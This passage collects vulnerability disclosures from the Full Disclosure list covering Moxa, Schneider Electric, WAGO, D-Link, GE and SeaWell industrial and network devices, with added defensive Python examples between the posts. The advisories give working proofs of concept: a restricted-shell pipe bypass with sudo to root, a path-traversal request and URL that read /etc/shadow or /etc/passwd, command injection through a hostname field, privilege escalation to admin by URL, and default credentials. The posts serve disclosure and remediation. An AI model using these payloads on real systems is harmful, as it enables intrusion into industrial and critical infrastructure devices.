data, modifying modbus/inverter/any other PLC devices, changing
Administrator password, changing configuration parameters, saving modified
configuration, & device reboot.

+

ICS-CERT published Meteocontrol advisory at:
https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01

Note that it is not complete and accurate. I have already sent my comments
to ICS-CERT team to correct their report. Hopefully they will update it
soon.

+++++

Cheers!
-- 
Best Regards,
Karn Ganeshen


[FD] Moxa MiiNePort - Multiple Vulnerabilities

2016-05-03 Thread Karn Ganeshen
*Moxa MiiNePort - Multiple Vulnerabilities*


Multiple vulnerabilities are present in Moxa MiiNePort. The following versions
have been verified, but it is highly probable all other versions are
affected as well.


*About*


Moxa provides a full spectrum of quality products for industrial
networking, computing, and automation, and maintains a distribution and
service network that reaches customers in more than 70 countries. Our
products have connected over 30 million devices worldwide in a wide range
of applications, including factory automation, smart rail, smart grid,
intelligent transportation, oil & gas, marine, and mining. By continually
improving staff expertise in a variety of technologies and markets, we aim
to be the first choice for industrial automation solutions.


Moxa's embedded serial-to-Ethernet device server modules are small, consume
less power, and integration is easy.

The embedded serial-to-Ethernet device servers modules consist of the
MiiNePort serial device server series and the NE device server module
series.


Moxa’s MiiNePort E3 series embedded device servers are designed for
manufacturers who want to add sophisticated network connectivity to their
serial devices with minimal integration effort. The MiiNePort E3 is
empowered by the MiiNe, Moxa’s second generation SoC, which supports 10/100
Mbps Ethernet, up to 921.6 kbps serial baudrate, a versatile selection of
ready-to-use operation modes, and requires only a small amount of power. By
using Moxa’s innovative NetEZ technology, the MiiNePort E3 can be used to
convert any device with a standard serial interface to an Ethernet enabled
device in no time. In addition, the MiiNePort E3 is a compact embedded
device server with an RJ45 connector, making it easy to fit into virtually
any existing serial device.


http://www.moxa.com/product/MiiNePort_E1.htm

http://www.moxa.com/product/MiiNePort_E2.htm

http://www.moxa.com/product/MiiNePort_E3.htm



*Confirmed Device Models + Firmware versions*
Device name MiiNePort_E1_7080
Firmware version 1.1.10 Build 09120714

Device name MiiNePort_E1_4641
Firmware version 1.1.10 Build 09120714

Device name MiiNePort_E2_1242
Firmware version 1.1 Build 10080614

Device name MiiNePort_E2_4561
Firmware version 1.1 Build 10080614

Model name MiiNePort E3
Firmware version 1.0 Build 11071409


*Vulnerability Summary*

1. Weak Credentials Management - CVE-2016-2286

2. Sensitive information not protected - CVE-2016-2295

3. Vulnerable to Cross-Site Request Forgery - CVE-2016-2285


*Vulnerability Description*


1. *Weak Credentials Management*

By default, no password is set on the device / application. The device /
application does not enforce a mandatory password change mechanism, forcing
users to a) set/change the password on first login, b) ensure the password
meets complexity requirements, and c) change password periodically.

This allows anyone to access the device over HTTP and Telnet. Access to the
device provides full administrative functionality.

2. *Sensitive information not protected*

Information such as Connect passwords and SNMP community strings is not
protected and is shown in clear-text when viewing and/or downloading the device
config (HTTP / Telnet).


3. *Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability allows silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, saving modified configuration, & device
reboot.

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
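The CSRF issue in item 3 above comes down to the device accepting any state-changing request that carries a valid session cookie. The following is an added illustration, not code from Moxa or from the post, of the synchronizer-token check a management web UI needs: a per-session token that the browser can only obtain from the device's own pages, verified on every state-changing request, with an Origin check as a second line of defence. The secret, the allowed origin and the request shapes are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret: constructed fresh at import here; a real device would generate it
# at first boot and persist it so issued tokens survive a restart.
SERVER_SECRET = secrets.token_bytes(32)
ALLOWED_ORIGINS = {"http://miineport.local"}          # hypothetical management origin
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Synchronizer token bound to the session: HMAC(secret, session id).
    Every form that changes state (password change, config save, reboot) embeds it as a
    hidden field. A cross-site page can make the browser send the session cookie, but it
    cannot read this value out of the device's own pages."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, presented, secret=SERVER_SECRET):
    # constant-time compare so the token cannot be guessed byte by byte
    return hmac.compare_digest(issue_csrf_token(session_id, secret), presented or "")


def authorize_request(method, headers, cookies, form, secret=SERVER_SECRET):
    """Return (allowed, reason) for one request. Read-only methods pass with a session;
    state-changing ones additionally need a same-site Origin (when the browser sends one)
    and a valid token in the form body."""
    session_id = cookies.get("sessionid")
    if not session_id:
        return False, "no session"
    if method.upper() not in STATE_CHANGING:
        return True, "read-only request"
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, f"cross-origin request from {origin}"
    if not verify_csrf_token(session_id, form.get("csrf_token", ""), secret):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo():
    """Two constructed requests against the same logged-in session: one forged from another
    site (cookie present, no token) and one from the device's own password-change form."""
    sid = "c0ffee"
    forged = authorize_request("POST", {"Origin": "http://other-site.example"},
                               {"sessionid": sid}, {"newpassword": "x"})
    legit = authorize_request("POST", {}, {"sessionid": sid},
                              {"newpassword": "x", "csrf_token": issue_csrf_token(sid)})
    return forged, legit


if __name__ == "__main__":
    print(demo())
```

The Origin check alone is not sufficient (older browsers omit the header and some proxies strip it), which is why the token remains the primary control; the two together also cover the password-change, config-save and reboot actions the post lists.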

[FD] Schneider Electric Building Operation Automation Server Multiple Vulnerabilities

2016-03-03 Thread Karn Ganeshen
*Schneider Electric Building Operation Automation Server Multiple
Vulnerabilities*

*Reported affected version:*
Schneider Electric Building Operation Automation Server
Firmware: Server 1.6.1.5000
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212

*Reported on: *August 2015
*Schneider Electric fix & public disclosure:*
Feb 25, 2016
*URL:*
http://oreo.schneider-electric.com/flipFlop/1739415603/index.htm?p_EnDocType=Technical%20leaflet&p_Reference=SEVD-2016-025-01&p_File_Name=SEVD-2016-025-01%20SBO%20AS.pdf&flipflop=1#/2

*Confirmed affected versions: *
Automation Server Series (AS, AS-P), v1.7 and prior

*Public Disclosure:*
March 01, 2016

*Vulnerabilities*
*1. Weak credential management*
*CVE-ID:* None *[ Mitre, CVE? ]*

There are two primary users:
a. root - password is not set by default - this is a problem as we will see
later in the vuln findings
- By default, root cannot SSH in.
b. admin - default password is 'admin'
- Anyone can remotely ssh in to the device using default admin/admin login.

The system / application allows a) weak creds to start with, and more
importantly, b) vulnerable versions lack a mechanism to force the user to
change the initial password on first use or later. This has been fixed in the
latest version.

*2. OS Command Injection*

After logging in to the device over SSH, the 'admin' user - the only
active, administrative user at this point - is provided a restricted shell
(msh), which offers a small set of application-specific functional
options.

$ ssh  -l admin
Password:

Welcome! (use 'help' to list commands)
admin@box:>

admin@box:> release
NAME=SE2Linux
ID=se2linux
PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)
VERSION_ID=0.2.0.212

admin@box:>

admin@box:> help
usage: help [command]
Type 'help [command]' for help on a specific command.

Available commands:
exit - exit this session
ps - report a snapshot of the current processes
readlog - read log files
reboot - reboot the system
setip - configure the network interface
setlog - configure the logging
setsnmp - configure the snmp service
setsecurity - configure the security
settime - configure the system time
top - display Linux tasks
uptime - tell how long the system has been running
release - tell the os release details

Attempting to run any different command will give an error message.

However, this restricted shell functionality (msh) can be bypassed to
execute underlying system commands, by appending '| ' to any of
the above set of commands:

admin@box:> uptime | ls
bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr
etc localization proc share var

admin@box:> uptime | cat /etc/passwd

root:x:0:0:root:/:/bin/sh
daemon:x:2:2:daemon:/sbin:/bin/false
messagebus:x:3:3:messagebus:/sbin:/bin/false
ntp:x:102:102:ntp:/var/empty/ntp:/bin/false
sshd:x:103:103:sshd:/var/empty:/bin/false
app:x:500:500:Linux Application:/:/bin/false
admin:x:1000:1000:Linux User,,,:/:/bin/msh

admin@box:> uptime | cat /etc/group
root:x:0:
wheel:x:1:admin
daemon:x:2:
messagebus:x:3:
adm:x:5:admin
power:x:20:app
serial:x:21:app
cio:x:22:app
lon:x:23:app
daemonsv:x:30:admin,app
utmp:x:100:
lock:x:101:
ntp:x:102:
sshd:x:103:
app:x:500:admin
admin:x:1000:admin

*3. Privilege Escalation / access to root*
*CVE-ID:* None *[ Mitre, CVE? ]*

Since this is an administrative user, an attacker can exploit OS command
injection to perform a variety of tasks from the msh shell. But isn't it better
to get a root shell instead?

As observed from Issue 1 above, root does not have a password set, and it
is possible to use 'sudo -i' and become root.
Note: sudo is not presented / offered to 'admin' in the set of functional
options available thru msh.

admin@box:> *sudo -i*

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

*root@box:~> *cat /etc/shadow
root:!:16650:0:9:7:::
sshd:!:1:0:9:7:::
admin:$6$:16652:0:9:7:::

+

The Automation Server (AS) is one functional component of the larger,
StruxureWare Building Operation platform (SBO) solution / environment. The
AS password gets sync’d to SBO application rbac. With the new release, the
default AS password will be forcefully changed, and msh has been
sufficiently improved to mitigate against command injection.

Issue 3, however, persists. Anyone with access to the msh shell can still drop
in to a root shell, and have some fun.

+
-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
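The msh bypass in issue 2 works because the restricted shell hands the whole input line to the system shell, so '| ls' becomes a pipeline. Below is an added example, not Schneider's msh and not code from the post, of how a restricted shell can dispatch the same command names without ever invoking a shell: an allowlist mapping each command to a fixed argv vector, shell metacharacters rejected outright, and execution via subprocess with shell=False. The command names are taken from the post's 'help' output; the binary paths behind them are assumptions.

```python
import shlex
import subprocess

# Allowlisted commands mapped to fixed argv vectors. The names are the ones msh offers
# in the post; the paths and arguments are assumptions for the example.
COMMANDS = {
    "uptime":  ["/usr/bin/uptime"],
    "ps":      ["/bin/ps", "-ef"],
    "release": ["/bin/cat", "/etc/os-release"],
    "readlog": ["/bin/tail", "-n", "50", "/var/log/messages"],
}

# Characters that only have meaning to a shell. Nothing here is ever passed to a shell,
# so rejecting them costs nothing and makes the intent explicit in the audit log.
METACHARS = set("|;&<>`$(){}\n\\")


class ShellRejected(Exception):
    pass


def build_argv(line):
    """Turn one line typed at the restricted prompt into an argv list.
    The post's bypass ('uptime | ls') relied on the line reaching /bin/sh; here the pipe
    is refused before parsing, and even without that check the word '|' would be an
    unexpected argument rather than an operator."""
    bad = METACHARS & set(line)
    if bad:
        raise ShellRejected(f"metacharacter(s) {sorted(bad)} not permitted")
    try:
        words = shlex.split(line)
    except ValueError as exc:            # unbalanced quotes
        raise ShellRejected(f"unparseable input: {exc}")
    if not words:
        raise ShellRejected("empty command")
    cmd, args = words[0], words[1:]
    if cmd not in COMMANDS:              # 'sudo', 'ls', 'cat' ... all end here
        raise ShellRejected(f"unknown command {cmd!r}")
    if args:                             # these commands take no user-supplied arguments
        raise ShellRejected(f"{cmd} takes no arguments")
    return list(COMMANDS[cmd])


def is_accepted(line):
    """True if the line maps to an allowlisted command, False if it was rejected."""
    try:
        build_argv(line)
        return True
    except ShellRejected:
        return False


def run_line(line):
    """Execute an accepted line. shell=False means argv is handed to execve() directly."""
    argv = build_argv(line)
    result = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    for attempt in ("uptime", "uptime | ls", "uptime | cat /etc/passwd", "sudo -i"):
        print(f"{attempt!r:32} -> {'accepted' if is_accepted(attempt) else 'rejected'}")
```

The dispatcher only closes the injection route; issue 3 (root reachable through sudo because root has no password) is an OS configuration matter and is handled by locking the root account and keeping the admin user out of the sudoers policy, not by anything in msh itself.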

[FD] WAGO IO PLC 758-870, 750-849, 750-849 vulnerabilities

2016-03-03 Thread Karn Ganeshen
  12 Oct  1  2010 mtab -> /proc/mounts
drwxrwxrwx 6 0 0 1024 Feb 24 18:22 network
-rw-r--r-- 1 0 0 1181 Oct  1  2010 nsswitch.conf
-rw-r--r-- 1 0 0   40 Oct  1  2010 partitions
-rw-r--r-- 1 0 0  459 Oct  1  2010 passwd
drwxr-xr-x 2 0 0 1024 Oct  1  2010 php5
--x------  1 0 0   53 Mar  3 14:40 pointercal
-rw-r--r-- 1 0 0  536 Oct  1  2010 profile
-rw-r--r-- 1 0 0  178 Oct  1  2010 protocols
-rw-r--r-- 1 0 0    8 Jun  7  2010 pure-ftpd.conf
drwxrwxrwx 2 0 0 1024 Oct  1  2010 rc.d
-rw-rw-rw- 1 0 0   53 Oct  1  2010 resolv.conf
-rw-r--r-- 1 0 0   14 Oct  1  2010 rootpartition
-rw-rw-rw- 1 0 0  341 Mar  2 17:08 rts3s.cfg
-rwxr-xr-x 1 0 0 3012 Jun  7  2010 screenrc
-rw-r--r-- 1 0 0 9590 Oct  1  2010 services
-rw-r----- 1 0 0  338 Oct  1  2010 shadow
-rw------- 1 0 0  280 Oct  1  2010 shadow-
-r--r----- 1 0 0 1712 Jun  7  2010 sudoers
-rwxrwxrwx 1 0 0   25 Jun  7  2010 timezone
-rwxr-xr-x 1 0 0  511 Mar  3 14:37 ts.conf
drwxr-xr-x 3 0 0 1024 Oct  1  2010 udev
-rwxr-xr-- 1 0 0  798 Oct  1  2010 udhcpc.script
-rw-r--r-- 1 0 0  357 Jun 15 21:42 webserver_conf.xml

226-Options: -l
226 45 matches total

Note: As seen above, access permissions are too open on multiple files and
directories.

ftp> get /etc/shadow
local: /etc/shadow remote: /etc/shadow
ftp: Can't access `/etc/shadow': Permission denied

ftp> get /etc/passwd
local: /etc/passwd remote: /etc/passwd
*ftp: Can't access `/etc/passwd': Permission denied*

ftp> get /etc/webserver_conf.xml
local: /etc/webserver_conf.xml remote: /etc/webserver_conf.xml
ftp: Can't access `/etc/webserver_conf.xml': Permission denied

ftp> get /etc/pure-ftpd.conf
local: /etc/pure-ftpd.conf remote: /etc/pure-ftpd.conf
ftp: Can't access `/etc/pure-ftpd.conf': Permission denied

*ftp> cd /etc/lighttpd  <— drwxr-xr-x*
250 OK. Current directory is /etc/lighttpd
ftp> ls
229 Extended Passive mode OK (|||10281|)
150 Accepted data connection
-rw-r--r-- 1 12 102   65 Jun  7  2010 lighttpd-htpasswd.user
-rw-r--r-- 1 12 102 3743 Jun 15 21:42 lighttpd.conf
-rw-r--r-- 1 12 102  414 Jun  7  2010 mod_fastcgi.conf

226-Options: -l
226 3 matches total

ftp> get lighttpd-htpasswd.user

local: lighttpd-htpasswd.user remote: lighttpd-htpasswd.user
229 Extended Passive mode OK (|||52622|)
150 Accepted data connection
100% |***|    65  484.55 KiB/s    00:00 ETA

226-File successfully transferred
226 0.001 seconds (measured here), 71.89 Kbytes per second
65 bytes received in 00:00 (3.14 KiB/s)
ftp>
ftp> get lighttpd.conf
local: lighttpd.conf remote: lighttpd.conf
229 Extended Passive mode OK (|||9954|)
150 Accepted data connection
100% |***|  3743  243.10 KiB/s    00:00 ETA

226-File successfully transferred
226 0.015 seconds (measured here), 249.64 Kbytes per second
3743 bytes received in 00:00 (160.62 KiB/s)
…..
*Note*: Above configuration files contain credentials.

Once in this directory, we can now also access the /etc/passwd file

*ftp> get /etc/passwd*
local: /etc/passwd remote: /etc/passwd
229 Extended Passive mode OK (|||1859|)
150 Accepted data connection
100% |***|   459    3.77 MiB/s    00:00 ETA
*226-File successfully transferred*
226 0.003 seconds (measured here), 143.76 Kbytes per second
459 bytes received in 00:00 (35.35 KiB/s)

+

-- 
Best Regards,
Karn Ganeshen

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
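The note above says the permissions in the FTP listing are too open. As an added example, not part of the post, the following parses an ls -l style listing like the one the FTP server returned and flags world-writable entries and credential-bearing files that are readable by everyone. The listing it runs on is constructed for the example in the same shape as the post's; the set of sensitive file names is an assumption drawn from the names shown above.

```python
import re

# Constructed listing in the shape of the FTP "ls" output above (mode, links, uid, gid,
# size, date, name), with the FTP status lines left in. Sample entries for the example,
# not the device's real ones.
SAMPLE_LISTING = """\
229 Extended Passive mode OK (|||10281|)
150 Accepted data connection
-rw-rw-rw- 1 0 0   53 Oct  1  2010 resolv.conf
drwxrwxrwx 2 0 0 1024 Oct  1  2010 rc.d
-rw-r--r-- 1 0 0  459 Oct  1  2010 passwd
-rw-r----- 1 0 0  338 Oct  1  2010 shadow
-r--r----- 1 0 0 1712 Jun  7  2010 sudoers
-rw-r--r-- 1 12 102 65 Jun  7  2010 lighttpd-htpasswd.user
-rw-r--r-- 1 0 0 9590 Oct  1  2010 services
lrwxrwxrwx 1 0 0   12 Oct  1  2010 mtab -> /proc/mounts
226 8 matches total
"""

LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxstST-]{9})\s+\d+\s+(?P<uid>\S+)\s+(?P<gid>\S+)\s+"
    r"(?P<size>\d+)\s+[A-Za-z]{3}\s+\d{1,2}\s+\S+\s+(?P<name>.+)$"
)

# Files whose contents are credentials or authorization policy. Assumption for the
# example, drawn from the names in the listing above (htpasswd, web, FTP and sudo config).
SENSITIVE_NAMES = {"shadow", "shadow-", "sudoers", "lighttpd-htpasswd.user",
                   "lighttpd.conf", "webserver_conf.xml", "pure-ftpd.conf"}


def parse_listing(text):
    """Return (mode, name) for each entry; FTP status lines and other noise are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_LINE.match(line.strip())
        if not m:
            continue
        name = m.group("name").split(" -> ")[0]      # drop a symlink target
        entries.append((m.group("mode"), name))
    return entries


def audit_listing(text):
    """Return (name, problem) pairs for entries a hardening review would flag."""
    findings = []
    for mode, name in parse_listing(text):
        kind, other = mode[0], mode[7:10]
        if kind == "l":
            continue        # a symlink's own mode is always rwxrwxrwx; judge its target instead
        if "w" in other:
            what = "directory" if kind == "d" else "file"
            findings.append((name, f"world-writable {what}"))
        if name in SENSITIVE_NAMES and "r" in other:
            findings.append((name, "credential file is world-readable"))
    return findings


if __name__ == "__main__":
    for name, problem in audit_listing(SAMPLE_LISTING):
        print(f"{name}: {problem}")
```

On the constructed sample this reports resolv.conf and rc.d as world-writable and lighttpd-htpasswd.user as a world-readable credential file, while shadow and sudoers (no permission bits for "other") pass; the same parser works on the output of a plain ls -l over SSH, which is where such a check belongs in a build or acceptance pipeline.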

[FD] DLink DVG-N5402SP Multiple Vulnerabilities

2016-02-03 Thread Karn Ganeshen
DLink DVG-N5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities

*Timelines*
Reported to CERT + Vendor: August 2015
Dlink released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) =
04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - Dlink waiting for Service providers to ask
for new release + CERT opted out


*Vulnerable Models, Firmware, Hardware versions*
DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

Device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245

*HTTP Request *

POST /cgi-bin/webproc HTTP/1.1
Host: :8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
&obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh


*HTTP Response*

HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage;
pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:-
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec- 23:59:59 GMT;
path=/

#root::13796:0:9:7:::
root::13796:0:9:7:::
#tw::13796:0:9:7:::
#tw::13796:0:9:7:::


*2. Use of Default, Hard-Coded Credentials*
*CVE-ID*: CVE-2015-7246

The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login - tw - is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled) leading to integrity, loss of confidentiality, or loss of
availability.

*3. Sensitive info leakage via device running configuration backup*
*CVE-ID*: CVE-2015-7247

Usernames, Passwords, keys, values and web account hashes (super & admin)
are stored in clear-text and not masked. It is noted that the restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
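Issue 1 above is the errorpage parameter being joined onto a document root and opened as-is. The following added example, not D-Link's code and not from the post, shows the two controls a web handler needs: resolving the requested path under the root and refusing anything that escapes it, and, better still, picking the error page from a fixed allowlist so the parameter never names a file at all. The document root and the page names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/www/html"                                        # hypothetical document root
ERROR_PAGES = {"html/error.html", "html/login_failed.html"}   # hypothetical allowlist


class TraversalRejected(Exception):
    pass


def resolve_under_root(root, requested):
    """Lexically resolve `requested` beneath `root`; raise if it would land outside.
    Pure string handling, so it runs offline. On a live filesystem follow it with
    os.path.realpath() on the result so a symlink cannot point back out of the root."""
    if "\x00" in requested:
        raise TraversalRejected("NUL byte in path")
    decoded = unquote(requested)                 # the server decodes %2e%2e exactly once
    if unquote(decoded) != decoded:
        raise TraversalRejected("double-encoded path")
    if decoded.startswith("/") or "\\" in decoded:
        raise TraversalRejected("absolute or backslash path")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # normpath has already collapsed every '..'; the only question left is where we ended up
    if posixpath.commonpath([root, candidate]) != root:
        raise TraversalRejected(f"{requested!r} escapes {root}")
    return candidate


def is_safe_path(root, requested):
    """True if the request resolves inside the root, False if it was rejected."""
    try:
        resolve_under_root(root, requested)
        return True
    except TraversalRejected:
        return False


def select_error_page(errorpage_param):
    """Preferred control: the parameter selects among known pages and never names a file.
    Unknown values fall back to the default page instead of echoing the input anywhere."""
    if errorpage_param not in ERROR_PAGES:
        return posixpath.join(WEB_ROOT, "html/error.html")
    return resolve_under_root(WEB_ROOT, errorpage_param)


if __name__ == "__main__":
    for p in ("html/index.html", "../../../../../../../../../../../etc/shadow",
              "%2e%2e/%2e%2e/etc/shadow"):
        print(f"{p!r:50} safe={is_safe_path(WEB_ROOT, p)}")
```

The traversal payload in the post's request resolves to /etc/shadow, whose common prefix with the root is "/", so resolve_under_root rejects it; with select_error_page the same value never reaches a path operation at all.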

[FD] GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text Sensitive Info Vulnerabilities

2016-02-03 Thread Karn Ganeshen
GE Industrial Solutions - UPS SNMP Adapter Command Injection and Clear-text
Storage of Sensitive Information Vulnerabilities

*Timelines:*
Reported to ICS-CERT on: July 06, 2015
Fix & Advisory Released by GE: January 25, 2015
Vulnerability ID: GEIS16-01

*GE Advisory: *
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf


*ICS-CERT Advisory:* In Progress

*About GE*

GE is a US-based company that maintains offices in several countries around
the world.

The affected product, SNMP/Web Interface adapter, is a web server designed
to present information about the Uninterruptible Power Supply (UPS).
According to GE, the SNMP/Web Interface is deployed across several sectors
including Critical Manufacturing and Energy. GE estimates that these
products are used worldwide.

*Affected Products*

• All SNMP/Web Interface cards with firmware version prior to 4.8
manufactured by GE Industrial Solutions.

*CVE-IDs:*
CVE-2016-0861
CVE-2016-0862


*VULNERABILITY OVERVIEW*
A


*COMMAND INJECTION*
*CVE-2016-0861*
Device application services run as the (root) privileged user and do not
perform strict input validation. This allows an authenticated user to
execute any system commands on the system.

Vulnerable function:
http://IP/dig.asp

Vulnerable parameter:
Hostname/IP address


*PoC:*
In the Hostname/IP address input, enter:
; cat /etc/shadow

Output
root::0:0:root:/root:/bin/sh
<...other system users...>
ge::101:0:gedeups7:/home/admin:/bin/sh
root123::102:0:gedeups2:/home/admin:/bin/sh

B


*CLEARTEXT STORAGE OF SENSITIVE INFORMATION*
*CVE-2016-0862*
File contains sensitive account information stored in cleartext. All users,
including non-admins, can view/access device's configuration, via Menu
option -> Save -> Settings.

The application stores all information in clear-text, including *all user
logins and clear-text passwords*.


+
I sent it out on Jan 29 but for some reason, it was not posted to FD. So
sending it again.
-- 
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
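The dig.asp injection above is the usual case of a hostname field being spliced into a shell command line, made worse by the service running as root. As an added example, not GE's code and not from the post, the following accepts exactly one IP literal or one RFC 1123 hostname and passes it as a single argv element to dig with shell=False, so a value like '; cat /etc/shadow' is rejected before any process starts. The dig path is an assumption.

```python
import ipaddress
import re
import subprocess

DIG = "/usr/bin/dig"          # assumed path to the resolver tool the page invokes

# One DNS label: 1-63 chars of letters, digits and '-', not starting or ending with '-'.
# The leading-hyphen rule also guarantees no input can be parsed by dig as an option.
LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def validate_target(value):
    """Return the value if it is one IP literal or one hostname; raise ValueError otherwise."""
    value = value.strip()
    if not value or len(value) > 253:
        raise ValueError("empty or too long")
    try:
        return str(ipaddress.ip_address(value))       # IPv4 or IPv6 literal
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if not all(LABEL.match(label) for label in labels):
        raise ValueError(f"not a hostname: {value!r}")
    return value


def is_valid_target(value):
    try:
        validate_target(value)
        return True
    except ValueError:
        return False


def build_dig_argv(value):
    """argv for the lookup. Validation happens first; the target becomes one element,
    never part of a string a shell would split on ';', '|' or whitespace."""
    return [DIG, "+short", validate_target(value)]


def lookup(value):
    """Run the lookup. This is the only place a process starts, and it starts via execve."""
    result = subprocess.run(build_dig_argv(value), shell=False,
                            capture_output=True, text=True, timeout=15)
    return result.stdout


if __name__ == "__main__":
    for candidate in ("ups.example", "10.0.0.1", "; cat /etc/shadow", "-f/etc/passwd"):
        print(f"{candidate!r:24} valid={is_valid_target(candidate)}")
```

Validation plus shell-free execution fixes the injection; the post's second observation, that the service runs as root, is addressed separately by running the web process under an unprivileged account so that even a future parsing bug cannot read /etc/shadow.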

[FD] SeaWell Networks Spectrum - Multiple Vulnerabilities

2016-01-20 Thread Karn Ganeshen
About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale
their IP video offerings, to meet the growing subscriber demands for video
delivered to smartphones, tablets and game consoles.

The result – Spectrum – is what we call a “Multiscreen 2.0” Session
Delivery Controller.

Spectrum is high-performance, carrier-grade software that takes ABR video
and repackages it – on-the-fly – into any other protocol, including Apple
HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/

*Affected version*
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.

*A. CWE-255: Credentials Management*
*CVE-2015-8282*

Weak, default login credentials - admin / admin

*B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')*
*CVE-2015-8283*

The configure_manage.php module accepts a file parameter which takes an
unrestricted file path as input, allowing an attacker (non-admin, low-
privileged user) to read arbitrary files on the system.

*PoC:*

https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

*C. CWE-285: Improper Authorization*
*CVE-2015-8284*

A low privileged, non-admin user, with only viewer privileges, can perform
administrative functions, such as create, update, delete a user (including
admin user), or access device's configuration files (policy.xml,
cookie_config.xml, systemCfg.xml). The application lacks Authorization
controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has
full access to the device. Viewer has access to very restricted functions.

It is possible for a viewer priv user to perform admin functions.

*PoC:*

Add new user [Admin function only]

GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

Here

admin -> userlevel=9
viewer -> userlevel=1

*Create new user with Admin privs*
Log in as viewer - try create new admin user - viewer1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

0*Success*
1

*Delete user*

